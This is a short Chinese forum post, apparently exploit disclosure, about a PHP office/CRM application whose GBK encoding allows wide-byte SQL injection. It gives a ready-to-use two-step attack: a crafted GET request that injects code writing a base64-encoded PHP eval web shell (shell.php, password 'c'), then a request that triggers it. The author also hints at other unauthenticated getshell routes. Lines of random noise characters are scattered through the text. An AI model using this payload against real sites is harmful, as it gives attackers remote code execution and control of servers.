此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.
2 h* u0 F# l: J6 a% ?% n5 _' P2 r* d# v+ Q
2 {2 U1 @ d2 e7 t6 P4 p
EXP:
* [& M: L5 t8 J* J/ U Q# `- B1 U
$ z4 d+ X4 G$ ?* g( P第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}; G; U& ~ k2 d$ @: i% f
8 {) E* C, T# t7 a4 R
第二步: [GET]http://site/general/email/index.php3 ~9 D% d! g+ u6 s% k' g @
, m/ T3 K( w- H2 G0 ^
SHELL: http://site/general/email/shell.php 密码C" d6 P6 m: u' H8 p- g. C
& Q% n5 T( O6 z1 f( N0 b- S- L . i$ ?5 t2 I& l
此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好$ Z$ [0 [8 Z& N. v. I$ B$ R- l
3 O* }7 T) W1 a b3 s; }
有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~+ ^9 f; n1 M1 q$ I; m
& `' T; K( l3 o/ H9 b4 f4 c
+ e5 d+ ?. |: D. P2 u& g
|